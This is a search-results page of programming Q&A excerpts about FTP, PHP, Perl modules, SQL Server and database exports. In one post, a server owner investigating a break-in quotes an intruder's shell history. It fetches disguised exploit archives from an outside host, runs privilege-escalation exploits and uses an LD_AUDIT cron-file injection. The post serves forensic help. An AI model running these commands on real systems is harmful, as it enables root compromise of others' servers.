Search Results

Search found 2798 results on 112 pages for 'ftp'.

Page 103/112

  • Strange Sql Server 2005 behavior

    - by Justin C
Background: I have a site built in ASP.NET with SQL Server 2005 as its database. The site is the only site on a Windows Server 2003 box sitting in my client's server room. The client is a local school district, so for data security reasons there is no remote desktop access and no remote SQL Server connection; if I have to service the database, I have to be at the terminal. I do have FTP access to update ASP code.

    Problem: I was contacted yesterday about an issue with the system. When I looked into it, it seems a bug that I had solved nearly a year ago had returned. I have a stored procedure that used to take an int as a parameter, but a year ago we changed the structure of the system and updated the stored procedure to take an nvarchar(10). The stored procedure somehow changed back to taking an int instead of an nvarchar. There is an external hard drive connected to the server that copies data periodically and can restore the server in case of failure. I would have assumed that somehow an older version of the database had been restored, but data that I know was inserted 7 days and 1 day before the bug occurred is still in the database.

    Question: Is there any way that the structure of a SQL Server 2005 database can revert or be restored to a previous version without touching the actual data? No one else should have access to the server, so I'm going a little insane trying to figure out how this even happened. Any ideas?

  • Why can't I simply copy installed Perl modules to other machines?

    - by pistacchio
Being very new to Perl but not to dynamic languages, I'm a bit surprised at how awkward module management is. Sure, cpan X theoretically works, but I'm working on the same project from three different machines and OSes (at work, at home, and testing in an external environment):

    At work (Windows 7) I have problems using cpan because our firewall makes FTP unusable.
    At home (Mac OS X) it does work.
    In the external environment (Linux CentOS) it worked after hours of effort, because I don't have root access and had to configure cpan to operate as a non-root user.
    I've also tried another server where I have access. Where the previous external environment is a VPS with shell access, this other one is a cheap shared host where I have no way to install modules other than the pre-installed ones.

    At the moment I still can't install Template under Windows. I've seen that as an alternative I could compile it, and I've also tried ActiveState's PPM, but the module doesn't exist there. Now, my perplexity is about Perl being a dynamic language. I've had all these kinds of problems while working, for example, with C, where I had to compile all the libraries for every platform, but I thought that with Perl the approach would be very similar to Python's or PHP's, where in 90% of cases copying the module into a directory and importing it simply works. So, my questions: if Perl modules are written in Perl, why doesn't the copy/paste approach work? If some modules (or parts of them) have to be compiled, how can I see on CPAN whether a module is pure Perl or relies on compiled libraries? Isn't there a way to download the module (tar, zip...) and use cpan to deploy it? This would solve my problem under Windows.

  • Editing a remote file on-the-fly with PHP

    - by user275074
Hi, I have a requirement to edit a remote text file on-the-fly; its content currently stands at ~1 MB. I have tried a couple of approaches and both seem to be clunky or to hog memory, which I can't rely on. Thinking it out logically, what I'm trying to achieve is:

    1. FTP to a remote server.
    2. Download a copy of the file for backup purposes and store it somewhere locally.
    3. Open the remote file and add the necessary lines.
    4. Remove lines from the remote file as per an array of un-required data generated on the local server.

    Is this possible? I've managed to code steps 1 and 2, but I'm having difficulty with 3 and 4. The way I'm doing it now is to use fgets and return the whole string. Really, I don't want to do this, as it involves manipulating and re-generating the whole string (and it's large) and then re-inserting it between two markers in the remote file. Is there no way of manipulating the lines of text in the file on-the-fly?
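
    FTP itself has no line-level editing, so the usual pattern is download, edit locally, re-upload. Below is a minimal sketch of steps 1-4 under that assumption; the host, credentials and file names are all placeholders:

      <?php
      // Minimal sketch: back up the remote file, edit it line-by-line
      // locally, then push the edited copy back. All names are placeholders.
      $conn = ftp_connect('ftp.example.com') or die('Connect failed');
      ftp_login($conn, 'user', 'pass') or die('Login failed');

      // Steps 1-2: download a dated backup copy.
      $backup = 'backup-' . date('Y-m-d-H-i-s') . '.txt';
      ftp_get($conn, $backup, 'remote.txt', FTP_ASCII) or die('Download failed');

      // Steps 3-4: drop un-required lines, append the new ones.
      $unwanted = array('old entry 1', 'old entry 2'); // generated locally
      $lines = file($backup, FILE_IGNORE_NEW_LINES);
      $lines = array_diff($lines, $unwanted);
      $lines[] = 'new line to add';

      // Write the edited version and replace the remote file.
      $edited = tempnam(sys_get_temp_dir(), 'edit');
      file_put_contents($edited, implode("\n", $lines) . "\n");
      ftp_put($conn, 'remote.txt', $edited, FTP_ASCII) or die('Upload failed');
      ftp_close($conn);

    Since the file is only ~1 MB, holding it in an array for the edit is cheap; the memory problems usually come from concatenating and regenerating the whole contents as one string rather than from the line array.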

  • Ubuntu Server hack [closed]

    - by haxpanel
Hi! I looked at netstat and noticed that someone besides me is connected to the server by SSH. I looked into this because my user should be the only one with SSH access. I found this in an FTP user's .bash_history file:

      w
      uname -a
      ls -a
      sudo su
      wget qiss.ucoz.de/2010/.jpg
      wget qiss.ucoz.de/2010.jpg
      tar xzvf 2010.jpg
      rm -rf 2010.jpg
      cd 2010/
      ls -a
      ./2010 ./2010x64 ./2.6.31
      uname -a
      ls -a
      ./2.6.37-rc2
      python rh2010.py
      cd ..
      ls -a
      rm -rf 2010/
      ls -a
      wget qiss.ucoz.de/ubuntu2010_2.jpg
      tar xzvf ubuntu2010_2.jpg
      rm -rf ubuntu2010_2.jpg
      ./ubuntu2010-2
      ./ubuntu2010-2
      ./ubuntu2010-2
      cat /etc/issue
      umask 0
      dpkg -S /lib/libpcprofile.so
      ls -l /lib/libpcprofile.so
      LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
      ping
      gcc
      touch a.sh
      nano a.sh
      vi a.sh
      vim
      wget qiss.ucoz.de/ubuntu10.sh
      sh ubuntu10.sh
      nano ubuntu10.sh
      ls -a
      rm -rf ubuntu10.sh
      . .. a.sh .cache ubuntu10.sh ubuntu2010-2
      ls -a
      wget qiss.ucoz.de/ubuntu10.sh
      sh ubuntu10.sh
      ls -a
      rm -rf ubuntu10.sh
      wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
      rm -rf W2Ksp3.exe
      passwd

    The system is in a jail. Does that matter in this case? What should I do? Thanks, everyone! I have already done the following: banned the connected SSH host with iptables, stopped sshd in the jail, and saved .bash_history, syslog, dmesg, and the files fetched by the wget lines in the history.

  • An online php debugger/code editor

    - by Zirak
It's a simple deal: I'm sometimes in places where I don't have my laptop and find myself with spare time and an idea for a project, but unfortunately I can't do anything about it. I tried a variety of solutions, including running IDEs (like PhpStorm or Aptana) from a disc-on-key or CD (very slow and unappealing) and several online solutions (like http://phpanywhere.net), and found that all of them are either buggy, overloaded or underloaded with features, just difficult to use, require FTP, etc. All that is required here is syntax highlighting and debugging alerts; no actual running of code. So the question is split into two: 1) Do you know of a good online PHP editor that you've used and enjoyed? 2) If not, then how would you go about making one? The second one seems a bit general, so I'll try to expand... It might be a good idea: if you can't find one, make one. The question is about the concept of making a syntax highlighter (shouldn't be too difficult), and the difficult part of catching PHP errors WITHOUT executing any PHP code. Thank you in advance.
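
    On the "catching errors without executing" part, PHP's command-line binary already does exactly this with its -l (lint) flag, which parses a file for syntax errors but never runs it. A minimal sketch of a server-side lint endpoint built on that, where the 'code' form field name is an assumption:

      <?php
      // Sketch: lint posted PHP without executing it, via `php -l`.
      // The 'code' POST field is hypothetical.
      $code = isset($_POST['code']) ? $_POST['code'] : '';
      $tmp = tempnam(sys_get_temp_dir(), 'lint');
      file_put_contents($tmp, $code);

      // -l only parses the file; no user code is run.
      exec('php -l ' . escapeshellarg($tmp) . ' 2>&1', $output, $status);
      unlink($tmp);

      header('Content-Type: text/plain');
      echo ($status === 0) ? 'No syntax errors detected' : implode("\n", $output);

    This only catches parse errors, not runtime ones, but that matches the "debugging alerts without running code" requirement about as far as static checking can go.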

  • link clickable and wordwrap

    - by newinjs
Hi, I'm using PHP's wordwrap for my comment box. This is my clickable-link function:

      function clickable_link($text) {
          $ret = ' ' . $text;
          $ret = preg_replace("#(^|[\n ])([\w]+?://[\w\#$%&~/.\-;:=,?@\[\]+]*)#is",
              "\\1<a class=\"hrefLink\" href=\"\\2\" target=\"_blank\">\\2</a>", $ret);
          $ret = preg_replace("#(^|[\n ])((www|ftp)\.[\w\#$%&~/.\-;:=,?@\[\]+]*)#is",
              "\\1<a class=\"hrefLink\" href=\"http://\\2\" target=\"_blank\">\\2</a>", $ret);
          $ret = preg_replace("#(^|[\n ])([a-z0-9&\-_.]+?)@([\w\-]+\.([\w\-\.]+\.)*[\w]+)#i",
              "\\1<a href=\"mailto:\\2@\\3\">\\2@\\3</a>", $ret);
          $ret = substr($ret, 1);
          return $ret;
      }

    and this is my wordwrap for the comment:

      $comment = clickable_link($comment);
      $comment = wordwrap($comment, 25, "\n", false);

    Once the 25-character limit is reached, my comment box breaks the link: http://www.websitetitle.com/showthread.php?t=2000 becomes http://www.websitetitle.com/showthread.php? <br> t=2000 and the link is broken. Is it possible to fix the link, or is there another workaround? Thank you.
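
    One likely culprit is the order of the two calls: by the time wordwrap runs, the URL has been expanded into an <a ...> tag that contains spaces, so the wrapper happily breaks inside the markup. A hedged fix is simply to wrap first and linkify second; with $cut = false, a bare URL contains no spaces and is left on one line:

      // Sketch: wrap the raw text before linkifying, so wordwrap never
      // sees (and never splits) the generated <a href="..."> markup.
      $comment = wordwrap($comment, 25, "\n", false);
      $comment = clickable_link($comment);

    The clickable_link regexes already accept "\n" as a boundary before a URL, so links that land at the start of a wrapped line are still matched.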

  • What database strategy to choose for a large web application

    - by Snoopy
I have to rewrite a large database application running on 32 servers. The hardware is up to date; each machine has two quad-core Xeons and 32 GB of RAM. The database is multi-tenant: each customer has his own file, around 5 to 10 GB each, and I run around 50 databases on this hardware. The app is open to the web, so I have no control over the load. There are no really complex queries, so SQL is not required if there is a better solution. The databases get updated via FTP every day at midnight and are otherwise read-only. C# is my favourite language and I want to use ASP.NET MVC. I thought about the following options:

    1. Two big machines running SQL Server 2012 to serve the 32 servers with data, with the 32 servers running IIS and providing REST services.
    2. Denormalize the database and use Redis on each web server, with Booksleeve as the Redis client.
    3. A combination of SQL Server and Redis.
    4. SQL Server 2012 together with Hadoop.
    5. Hadoop without SQL Server.

    What is the best way, for a read-only database, to get the best performance without losing maintainability? Does map-reduce make sense at all in such a scenario? The reason for the rewrite is that the old app, written in C++ with ISAM technology, is too slow, and its interfaces are old-fashioned and not nice to use from a website, especially with Ajax. The app uses a relational data model with many tables, but it is possible to write one accelerator table against which all queries can be performed, with all other information from the other tables reachable by a simple key lookup.

  • Export large amount of data from Oracle 10G to SQL Server 2005

    - by uniball
Dear all, I need to export 100 million rows (average row length ~100 bytes) from an Oracle 10g database table into SQL Server (over a WAN/VLAN with 6 Mbit/s capacity) on a regular basis. So far, these are the options I have tried, with a quick summary of each. Has anyone tried this before? Are there other, better options? Which option would be the best in terms of performance and reliability? The times below were calculated from tests on smaller amounts of data and then extrapolated.

    1. Using the data import wizard on the SQL Server, or SSIS packages, to import the data. It will take around 150 hours to complete the task.
    2. Using an Oracle batch job to spool data into a comma-delimited flat file, then using an SSIS package to FTP this file to the SQL Server and load directly from the flat file. The issue here is the size of the flat file, which is expected to run into gigabytes.
    3. Although this option is drastically different, I am even considering using a linked server to query the Oracle data directly at run-time, to avoid bringing the data over at all. Performance is a big problem, and I have limited control over the Oracle database in terms of creating table indexes.

    Regards, Uniball

  • Design an Application That Stores and Processes Files

    - by phasetwenty
I'm tasked with writing an application that acts as a central storage point for files (usually document formats) provided by other applications. It also needs to take commands like "file 395 needs a copy in X format", at which point some work is offloaded to a third-party application. I'm having trouble coming up with a strategy for this. I'd like to keep the design as simple as possible and avoid big extra frameworks or techniques like threads for as long as that makes sense. The clients are expected to be web applications (for example, one is a Django application that receives files from our customers; the others are not yet implemented). The platform it will be running on is likely Python on Linux, unless I have a strong argument to use something else. In the beginning I thought I could fit the information I wanted to communicate into the filenames and let my application parse the filename to figure out what it needed to do, but this is proving too inflexible given the amount of information I'm realizing I need to make available. Another idea is to pair FTP with a database used as a communication medium (the client uploads a file and updates the database with a command as a row in a table), but I don't like this idea because adding commands (a known change) looks like it will require adding code as well as changing database schemas. It will also muddy up the interface my clients have to use. I looked into Pyro to let applications communicate more directly, but I don't like the idea of running an extra nameserver for this one purpose, and I don't see a good way to do file transfer within that framework. What I'm looking for is techniques and/or technologies applicable to my problem. At the simplest level, I need the ability to accept files and messages with them.

  • Accents in uploaded file being replaced with '?'

    - by Katfish
I am building a data import tool for the admin section of a website I am working on. The data is in both French and English and contains many accented characters. Whenever I attempt to upload a file, parse the data, and store it in my MySQL database, the accents are replaced with '?'. I have text files containing data (charset iso-8859-1) which I upload to my server using CodeIgniter's file upload library. I then read the file in PHP. My code is similar to this:

      $this->upload->do_upload();
      $data = array('upload_data' => $this->upload->data());
      $fileHandle = fopen($data['upload_data']['full_path'], "r");
      while (($line = fgets($fileHandle)) !== false) {
          echo $line;
      }

    This produces lines with accents replaced by '?'. Everything else is correct. If I download my uploaded file from my server over FTP, the charset is still iso-8859-1, but a diff reveals that the file has changed. However, if I open the file in TextEdit, it displays properly. I attempted to use PHP's stream_encoding method to explicitly set my file stream to iso-8859-1, but my build of PHP does not have the method. After running out of ideas, I tried wrapping my strings in both utf8_encode and utf8_decode. Neither worked. If anyone has any suggestions about things I could try, I would be extremely grateful.
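
    If the MySQL connection and tables expect UTF-8, a common hedged fix is to convert each line from ISO-8859-1 to UTF-8 as it is read, before it goes anywhere near the database. A minimal sketch (iconv could equally be utf8_encode, which converts exactly Latin-1 to UTF-8):

      // Sketch: convert each Latin-1 line to UTF-8 before inserting.
      // Assumes the MySQL connection is also set to UTF-8, e.g. via
      // mysql_query("SET NAMES utf8") right after connecting.
      while (($line = fgets($fileHandle)) !== false) {
          $utf8 = iconv('ISO-8859-1', 'UTF-8', $line);
          // ... parse $utf8 and insert it ...
      }

    If the '?' characters already appear when simply echoing, also check the output side: a page served without a matching charset header will mangle the display even when the underlying bytes are fine.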

  • implementing a Intelligent File Transfer Software in java over TCP/IP

    - by whyjava
Hello, I am working on a proposal where we have to implement software that can move files from a source to a destination. The overall goal of this project is to create intelligent file transfer. The software will have three components:

    1) Broker: the module that communicates with other brokers, monitors files, moves files, retrieves configurations from the Configuration Manager, supplies process information for the monitor, archives files, writes all process data to log files, and escalates issues if necessary.
    2) Configuration Manager: a web-based application used to configure and deploy the configuration to all brokers.
    3) Monitor: a web-based application used to monitor each Broker in the environment.

    This project has to be built in Java, with the file transfer protocol on raw TCP/IP; the client does not want to use FTP. File transfer seems very easy, until there are several processes waiting to pick the file up automatically. Several problems arise: How can we guarantee the file is received at the destination? If a file isn't received the first time, how do we retry (even after a restart or power breakdown)? How does the receiver know the file it received is complete? How can we transfer multiple files synchronously? How can we protect the bandwidth, so file transfer isn't blocking other processes? How does one interoperate between multiple OS platforms? What about authentication? How can we monitor the workflow? Auditing/logging? Archiving? Can you please provide answers to some of these? Thanks

  • Automated test, build and deploy

    - by mike79
I have Visual Studio Team Suite 2008. I was unable to meet the requirements to set up TFS, so I'm using TortoiseSVN and VisualSVN as my version control in VSTS. I need the system set up to do the following: I need to be able to create and track work items. When updates are made to the current project in VSTS, the updates will be committed back to version control. Tests will be run to see that updates don't break the application. If there's a problem with an update, it will be reported back to the developer. If there's no problem with the app, which is a ClickOnce application, it will automatically be built and deployed to an FTP server. I've never worked with version control, build servers, automated testing or continuous integration, so I need to know what needs to be put in place for this type of system. I don't know which combination/stack I should be using: CC.net, TeamCity, Hudson, NAnt, NUnit, MsTest, Trac, BugTracker.net, NDepend, VisualSvn Server, Perforce, Msdeploy, SCM. I want something that is free/open source and relatively easy to set up and use. Please suggest a setup that will fit my needs. Any help appreciated.

  • Validating parameters according to a fixed reference

    - by James P.
The following method is for setting the transfer type of an FTP connection. Basically, I'd like to validate the character input (see comments). Is this going overboard? Is there a more elegant approach? How do you approach parameter validation in general? Any comments are welcome.

      public void setTransferType(Character typeCharacter, Character optionalSecondCharacter)
              throws NumberFormatException, IOException {
          // http://www.nsftools.com/tips/RawFTP.htm#TYPE
          // Syntax: TYPE type-character [second-type-character]
          //
          // Sets the type of file to be transferred. type-character can be any of:
          //   * A - ASCII text
          //   * E - EBCDIC text
          //   * I - image (binary data)
          //   * L - local format
          //
          // For A and E, the second-type-character specifies how the text should
          // be interpreted. It can be:
          //   * N - Non-print (not destined for printing). This is the default if
          //     second-type-character is omitted.
          //   * T - Telnet format control (<CR>, <FF>, etc.)
          //   * C - ASA Carriage Control
          //
          // For L, the second-type-character specifies the number of bits per
          // byte on the local system, and may not be omitted.
          final Set<Character> acceptedTypeCharacters = new HashSet<Character>(
                  Arrays.asList(new Character[] { 'A', 'E', 'I', 'L' }));
          final Set<Character> acceptedOptionalSecondCharacters = new HashSet<Character>(
                  Arrays.asList(new Character[] { 'N', 'T', 'C' }));

          if (acceptedTypeCharacters.contains(typeCharacter)) {
              if (new Character('A').equals(typeCharacter)
                      || new Character('E').equals(typeCharacter)) {
                  if (acceptedOptionalSecondCharacters.contains(optionalSecondCharacter)) {
                      executeCommand("TYPE " + typeCharacter + " " + optionalSecondCharacter);
                  }
              } else {
                  executeCommand("TYPE " + typeCharacter);
              }
          }
      }

  • Threadpool design question

    - by ZeroVector
I have a design question and want some feedback on whether a ThreadPool is appropriate for the client program I am writing. The client runs as a service, processing database records. Each record contains connection information for an external FTP site [basically it is a queue of files to transfer]. A lot of them are to the same host, just moving different files, so I am grouping them together by host. I want to be able to create a new thread per host. I really don't care when the transfers finish; they just need to do all the work (or try to) they were assigned and then terminate once they are finished, cleaning up all resources they used in the process. I anticipate no more than 10-25 connections being established. Once the transfer queue is empty, the program will simply wait until there are records in the queue again. Is the ThreadPool a good candidate for this, or should I use a different approach? Edit: For the most part, this is the only significant custom application running on the server.

  • GPG error occurs while using "deb file:/local-path-to-repo ..." in /etc/apt/sources.list

    - by Chandler.Huang
I need to install packages in an environment with no Internet connection. My plan is to download the dists structure from the Internet and then add a file: path to /etc/apt/sources.list. So I downloaded the related structure (ubuntu/dists/precise, precise-backports, precise-proposed, precise-security, precise-updates) from an FTP mirror server. I then removed the original sources and added the following to my /etc/apt/sources.list:

      deb file:path-to-local-ubuntu-directory/ precise main restricted multiverse universe
      deb-src file:path-to-local-ubuntu-directory/ precise main restricted multiverse universe

    After apt-get update I get the following GPG error:

      root@openstack:/~# apt-get update
      Ign file: precise InRelease
      Get:1 file: precise Release.gpg [198 B]
      Get:2 file: precise Release [50.1 kB]
      Ign file: precise Release
      Get:3 file: precise/main TranslationIndex [3,761 B]
      Get:4 file: precise/multiverse TranslationIndex [2,716 B]
      Get:5 file: precise/restricted TranslationIndex [2,636 B]
      Get:6 file: precise/universe TranslationIndex [2,965 B]
      Reading package lists... Done
      W: GPG error: file: precise Release: The following signatures were invalid: BADSIG 0976EAF437D05B5 Ubuntu Archive Automatic Signing Key <[email protected]>

    I had tried the following steps after googling, but in vain:

      sudo apt-get clean
      cd /var/lib/apt
      sudo mv lists lists.old
      sudo mkdir -p lists/partial
      sudo apt-get update

    Is there any way to resolve this? And why does this error occur? Thanks a lot.
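
    A BADSIG on a hand-copied mirror usually means the downloaded Release and Release.gpg files no longer match (for example, each came from a different sync run of the mirror), so re-fetching both from the same mirror snapshot is the first thing to check. If the local copy is trusted anyway, one workaround, assuming your apt version supports the trusted flag, is to mark the source as trusted so signature verification is skipped entirely:

      deb [trusted=yes] file:path-to-local-ubuntu-directory/ precise main restricted multiverse universe

    That trades away the integrity check, so it is only sensible for a mirror you control yourself.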

  • Exporting database from external server (without SSH access)

    - by Derek Carlisle
Our current website is hosted by the design agency who originally built it, but we are bringing development in house and therefore need to export the database from their server and import it into ours. We have FTP and phpMyAdmin access, but no SSH access to the server. I was hoping to run a PHP script that would mysqldump the database, compress it, and then copy it across to our server using scp:

      $backupFile = $_SERVER['DOCUMENT_ROOT'].'/backup' . date("Y-m-d-H-i-s") . '.gz';
      system("mysqldump -h DB_HOST -u DB_USER -pDB_PASS DB_NAME | gzip > $backupFile");
      exec("sshpass -p PASSWORD scp -r -P PORT_NUMBER $backupFile [email protected]:/path/to/directory/");

    I ran this locally from the command line and it worked fine, although I had to install sshpass (the hosting server might not have this installed). I was hoping to run it from the browser as I don't have command-line access on the hosting server; however, it didn't work, and no errors were produced. Can anyone recommend how I can export from a server that I don't have SSH access to and import it into my server? Thanks
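
    Since sshpass and even scp may be missing on the agency's box, one hedged alternative is to drop the scp step entirely: let their server write the dump into an FTP-visible directory (the first two lines of the script above already do this), then pull it from your own server with PHP's FTP functions. Host, credentials and paths below are placeholders:

      <?php
      // Sketch, run on *our* server: fetch the dump the remote script
      // wrote into its web root. All connection details are placeholders.
      $conn = ftp_connect('ftp.agencyhost.example') or die('connect failed');
      ftp_login($conn, 'ftpuser', 'ftppass') or die('login failed');
      ftp_pasv($conn, true); // passive mode is often required through firewalls
      ftp_get($conn, 'backup.gz', 'public_html/backup.gz', FTP_BINARY)
          or die('download failed');
      ftp_close($conn);

    Failing that, phpMyAdmin's Export tab produces the same gzipped dump through the browser, which sidesteps exec() restrictions on shared hosting.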

  • File IO with Streams - Best Memory Buffer Size

    - by AJ
I am writing a small IO library to assist with a larger (hobby) project. A part of this library performs various functions on a file, which is read/written via the FileStream object. On each StreamReader.Read(...) pass, I fire off an event which will be used in the main app to display progress information. The processing that goes on in the loop is varied, but is not too time-consuming (it could just be a simple file copy, for example, or may involve encryption...). My main question is: what is the best memory buffer size to use? Thinking about physical disk layouts, I could pick 2 KB, which would cover a CD sector size and is a nice multiple of a 512-byte hard disk sector. Higher up the abstraction tree, you could go for a larger buffer which could read an entire FAT cluster at a time. I realise that with today's PCs I could go for a more memory-hungry option (a couple of MiB, for example), but then I increase the time between UI updates and the user perceives a less responsive app. As an aside, I'm eventually hoping to provide a similar interface to files hosted on FTP/HTTP servers (over a local network / fast-ish DSL). What would be the best memory buffer size for those (again, a "best-case" tradeoff between perceived responsiveness and performance)?

  • running php script manually and getting back to the command line?

    - by Simpson88Keys
I'm running a PHP script via the command line, and it works just fine, except that when it's finished it doesn't return to the command line; it just sits there, so I never know when it's done. This is the script:

      $conn_id = ftp_connect(REMOTE) or die("Couldn't connect to " . REMOTE);
      $login_result = ftp_login($conn_id, 'OMITTED', 'OMITTED');
      if ((!$conn_id) || (!$login_result)) die("FTP Connection Failed");

      $dir = 'download';
      if ($dir != ".") {
          if (ftp_chdir($conn_id, $dir) == false) {
              echo ("Change Dir Failed: $dir<BR>\r\n");
              return;
          }
          if (!(is_dir($dir))) mkdir($dir);
          chdir($dir);
      }

      $contents = ftp_nlist($conn_id, ".");
      foreach ($contents as $file) {
          if ($file == '.' || $file == '..') continue;
          if (@ftp_chdir($conn_id, $file)) {
              ftp_chdir($conn_id, "..");
              ftp_sync($file);
          } else {
              ftp_get($conn_id, $file, $file, FTP_BINARY);
          }
      }
      ftp_chdir($conn_id, "..");
      chdir("..");
      ftp_close($conn_id);

  • Newbie - eclipse workflow (PHP development)

    - by engil
Hi all; this is a bit of a newbie question, but I'm hoping I can get some guidance. I've been playing around with Eclipse for a couple of months, yet I'm still not completely comfortable with my setup, and it seems like every time I install it on a new system I end up with different results. What I'm hoping to achieve is (I think) fairly standard. In my environment I'd like SVN (currently using Subclipse), FTP support (currently using the Aptana plugin), debugging (going to use Xdebug) and all the usual bells and whistles of development (code completion, refactoring, etc.). My biggest current issue is how to set up my environment to support both a 'development' and a 'production' server. Optimally I would be able to work directly against the dev server (Eclipse on my Vista desktop against the VM Ubuntu dev server) and then push to the production server (shared hosting). I'd prefer to work directly against the dev server (with no local project files, just using the Connections provided by Aptana), but I'm guessing this won't allow for code completion or all the other bells and whistles provided for development. Any thoughts? It's kind of an open-ended question, but maybe this could be an opportunity for some of you with a great deal of Eclipse experience to describe your setups, so people like me can get some insight into good ways to get set up.

  • perl system command return code

    - by Mel
I have a script that has been running for over a year and is now failing. It creates a command file:

      open(FTPFILE, ">get_list");
      print FTPFILE "dir *.txt\n";
      print FTPFILE "quit\n";
      close FTPFILE;

    Then I run the system command:

      $command = "ftp " . $Server . " < get_list | grep \"\^-\" >new_list";
      $code = system($command);

    The logic then checks:

      if ($code == 0) { do stuff } else { log error }

    It is logging an error. When I print the $code variable, I get 256. I used this to parse the $? variable:

      $exit_value = $? >> 8;
      $signal_num = $? & 127;
      $dumped_core = $? & 128;
      print "Exit: $exit_value Sig: $signal_num Core: $dumped_core\n";

    Results: Exit: 1 Sig: 0 Core: 0. Thanks for any help/insight.

  • Jquery failure after site went live

    - by Brandon Condrey
I have been designing a site for weeks using jQuery. I don't have a local server or a testing server, so I just created a directory through FTP, '/testing'. Everything was working great in the testing directory. I attempted to go live tonight by moving all the files in '/testing' to the root directory, and I changed all file paths and script sources accordingly. The site loads, but everything related to jQuery is non-functional. The JavaScript console gives errors like (just as an example, from a plugin): '$.os.name' is not a function. I'm at a loss for what to do. I changed the paths referencing the jQuery library, installed a fresh copy of jQuery (to a new directory), etc. There is a WordPress installation in a different directory, '/blog'. I've read about some compatibility issues with WordPress, but those seem to be related to using jQuery inside WordPress, which I am not. I'm not sure if any code would be beneficial since it was all functional in a different directory. Your help is greatly appreciated.

  • AppleScript: open frontmost file with another application

    - by jacobianism
I'd like to write an AppleScript program to do the following (Automator would be fine too): I want to open the currently active TextMate file (possibly there are several tabs open, and other windows) with the application Transmit 2. (This will upload the file over FTP using Transmit's DockSend feature.) Here I've used a specific application (TextMate), but ideally I'd like it to work for the file currently active in any application. Ultimately I will assign a keyboard shortcut to run it. Here's what I have so far:

      tell application (path to frontmost application as text)
          set p to path of document 1
      end tell
      tell application "Finder"
          open POSIX file p using "Transmit 2"
      end tell

    I've tried many variants of this and nothing works. EDIT: I have found this page: http://wiki.macromates.com/Main/Howtos and someone has made exactly the script I'm looking for:

      tell application "Transmit" to open POSIX file "$TM_FILEPATH"

    This is for Transmit [not 2], and I think for TextMate pre-v2. With Transmit 2 I get the error: Transmit 2 got an error: AppleEvent handler failed. One of the updates to v2 has broken it (not sure which one).

  • actionscript find and convert text to url

    - by gravesit
I have this script that grabs a Twitter feed and displays it in a little widget. What I want to do is look at the text for a URL and convert that URL into a link.

      public class Main extends MovieClip {
          private var twitterXML:XML; // This holds the xml data

          public function Main() {
              // This is Untold Entertainment's Twitter id. Did you grab yours?
              var myTwitterID = "username";
              // Fire the loadTwitterXML method, passing it the url to your Twitter info:
              loadTwitterXML("http://twitter.com/statuses/user_timeline/" + myTwitterID + ".xml");
          }

          private function loadTwitterXML(URL:String):void {
              var urlLoader:URLLoader = new URLLoader();
              // When all the junk has been pulled in from the url, we'll fire finishLoadingXML:
              urlLoader.addEventListener(Event.COMPLETE, finishLoadingXML);
              urlLoader.load(new URLRequest(URL));
          }

          private function finishLoadingXML(e:Event = null):void {
              // All the junk has been pulled in from the xml! Hooray!
              // Remove the eventListener as a bit of housecleaning:
              e.target.removeEventListener(Event.COMPLETE, finishLoadingXML);
              // Populate the xml object with the xml data:
              twitterXML = new XML(e.target.data);
              showTwitterStatus();
          }

          private function addTextToField(text:String, field:TextField):void {
              /* Regular expression for replacement, g: replace all, i: case-insensitive.
                 Finds all strings starting with "http(s)://", "ftp://" or "file://",
                 followed by any number of characters that are neither spaces nor new lines. */
              var reg:RegExp = /(\b(https?|ftp|file):\/\/[-A-Z0-9+&@#\/%?=~_|!:,.;]*[-A-Z0-9+&@#\/%=~_|])/ig;
              // Replace. Note: "$&" stands for the matched string. String.replace
              // returns a new string, so the result must be assigned:
              field.htmlText = text.replace(reg, "<a href=\"$&\">$&</a>");
          }

          private function showTwitterStatus():void {
              // Uncomment this line if you want to see all the fun stuff Twitter sends you:
              //trace(twitterXML);
              // Prep the text field to hold our latest Twitter update:
              twitter_txt.wordWrap = true;
              twitter_txt.autoSize = TextFieldAutoSize.LEFT;
              // Populate the text field with the first element in the status.text nodes:
              addTextToField(twitterXML.status.text[0], twitter_txt);
          }
      }

  • How to current snapshot of MySQL Table and store it into CSV file(after creating it) ?

    - by Rachel
I have a large database table, approximately 5 GB, and I want to get a current snapshot of it using "SELECT * FROM MyTableName". I am using PDO in PHP to interact with the database, so preparing a query and then executing it:

      // Execute the prepared query
      $result->execute();
      $resultCollection = $result->fetchAll(PDO::FETCH_ASSOC);

    is not an efficient way, as lots of memory is used for storing the data into the associative array (approximately 5 GB). My final goal is to collect the data returned by the SELECT query into a CSV file and put that CSV file at an FTP location from where the client can get it. The other option I thought of was:

      SELECT * INTO OUTFILE "c:/mydata.csv"
        FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '"'
        LINES TERMINATED BY "\n"
        FROM my_table;

    But I am not sure if this would work, as I have a cron job that initiates the complete process and we do not have a CSV file yet, so basically for this approach the PHP script will have to: create a CSV file, do a SELECT query on the database, and store the query result in the CSV file. What would be the best or most efficient way to do this kind of task? Any suggestions!
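
    One option that avoids both the 5 GB array and the server-side OUTFILE path is to stream the result set row by row and write each row straight to the CSV as it arrives. A minimal sketch, with connection details as placeholders:

      <?php
      // Sketch: stream rows to CSV without buffering the whole result set.
      $pdo = new PDO('mysql:host=localhost;dbname=mydb', 'user', 'pass');
      // Unbuffered mode: rows come back from MySQL one at a time.
      $pdo->setAttribute(PDO::MYSQL_ATTR_USE_BUFFERED_QUERY, false);

      $csv = fopen('/tmp/mydata.csv', 'w');
      $stmt = $pdo->query('SELECT * FROM MyTableName');
      while ($row = $stmt->fetch(PDO::FETCH_ASSOC)) {
          fputcsv($csv, $row); // only one row is held in memory at a time
      }
      fclose($csv);
      // The finished file can then be pushed to the FTP location, e.g. with ftp_put().

    With an unbuffered query nothing else can run on the same connection until the statement is finished, which is usually fine for a dedicated cron job.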

  • how to fetch data using jquery

    - by user3566029
I have tried to connect to my index.php file on 000webhost.com using jQuery. From the Site menu I connected to 000webhost using the FTP details available on 000webhost.com. When I try to read data with jQuery, it doesn't work. Can anyone tell me what I need to change? Do I need to connect my Dreamweaver database to the web host? If yes, please explain. This is what I have done. index.php:

      $mysql_host = "mysql0.000webhost.com";
      $mysql_database = "a000000_mydb";
      $mysql_user = "a000000_root";
      $mysql_password = "******";

      $conn = @mysql_connect($mysql_host, $mysql_user, $mysql_password) or die('aa');
      mysql_select_db($mysql_database, $conn) or die('eoor on db');

      $quer = mysql_query("SELECT * FROM sam");
      $res = array();
      while ($row = mysql_fetch_row($quer)) {
          $res[] = $row;
      }
